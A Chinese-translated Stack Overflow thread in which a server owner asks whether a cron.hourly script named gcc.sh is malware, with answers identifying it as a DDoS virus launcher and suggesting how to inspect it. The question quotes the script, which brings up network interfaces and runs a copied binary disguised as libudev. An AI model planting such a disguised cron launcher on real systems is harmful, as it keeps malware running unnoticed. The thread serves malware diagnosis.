这个文件 (gcc.sh) 是否在 cron.hourly 恶意软件中?

【问题标题】:Is this file (gcc.sh) in cron.hourly malware?这个文件 (gcc.sh) 是否在 cron.hourly 恶意软件中?
【发布时间】:2016-04-14 12:47:27
【问题描述】:

我的服务器上出现了高达 1 Gbps 的峰值,并且一直在寻找病毒和恶意软件。我在 /etc/cron.hourly 中找到了这个文件:gcc.sh,我想知道是否有人看到过类似的东西,并且会对代码有所了解。谢谢!

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/binfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

【问题讨论】:

    标签: linux exploit malware virus


    【解决方案1】:

    很有可能。它使用 /lib/libudev.so.6 作为可执行文件,而名称暗示它应该是一个库 - 尝试使用 nm 或 objdump 之类的工具来查看它是否是可执行文件。它从 /lib/libudev.so 复制到 .so.6 - 而通常 .so 是版本化的符号链接。它还会运行一个 for 循环来启动所有网络连接,即使您已将其关闭。它使用知名编译器的名称来看起来合法。我认为这 99% 以上很可能是病毒。

    发现另一个自称为 gcc 的东西的引用 - https://superuser.com/questions/863997/ddos-virus-infection-as-a-unix-service-on-a-debian-8-vm-webserver 。是的,这是 Unix 系统上的 DDoS 病毒,完全符合您的问题。

    【讨论】:

      【解决方案2】:

      是的。

      尝试使用 ps -ef | grep -i libudev.so.6 查看程序使用的进程

      【讨论】:

        猜你喜欢
        • 1970-01-01
        • 2020-08-09
        • 2015-09-05
        • 1970-01-01
        • 2012-03-26
        • 1970-01-01
        • 2019-01-10
        • 2014-03-16
        • 1970-01-01
        相关资源
        最近更新 更多
        热门标签
        Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode